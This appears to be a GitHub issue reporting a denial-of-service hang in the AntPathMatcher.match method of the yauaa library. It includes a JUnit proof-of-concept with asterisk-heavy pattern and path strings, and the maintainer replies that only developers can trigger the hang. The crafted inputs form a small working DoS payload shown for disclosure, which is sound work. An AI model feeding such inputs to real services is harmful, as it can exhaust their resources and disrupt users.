AntPathMatcher.match is vulnerable to out of denial of service (DoS) attack

[PoppingSnack]

AntPathMatcher.match is vulnerable to out of denial of service (DoS) attack

Description

A denial of service vulnerability exists in the AntPathMatcher.match method.

PoC

        <dependency>
            <groupId>nl.basjes.parse.useragent</groupId>
            <artifactId>yauaa</artifactId>
            <version>7.23.0</version>
        </dependency>

import nl.basjes.parse.useragent.utils.springframework.util.AntPathMatcher;
import org.junit.Test;

public class AntPathMatcherFuzzerMatch {
    // 超时
    @Test
    public void matchFuzzerTest() {
        try {
            String tempString1 = "*******************************************:********************************************************";
            String tempString2 = "****************** / HTTP/1.6\n\n / HTTP/1.6\n\n / HT0";
            AntPathMatcher antPathMatcher = new AntPathMatcher();
            boolean result = antPathMatcher.match(tempString1, tempString2);
        } catch (Exception e) {
        }
    }
}

Above code will run without termination.

[nielsbasjes]

Not really a problem.
Only the developer/admin using this library can trigger this.
If you think this is a problem report it to the SpringProject (that is where I copied this class from)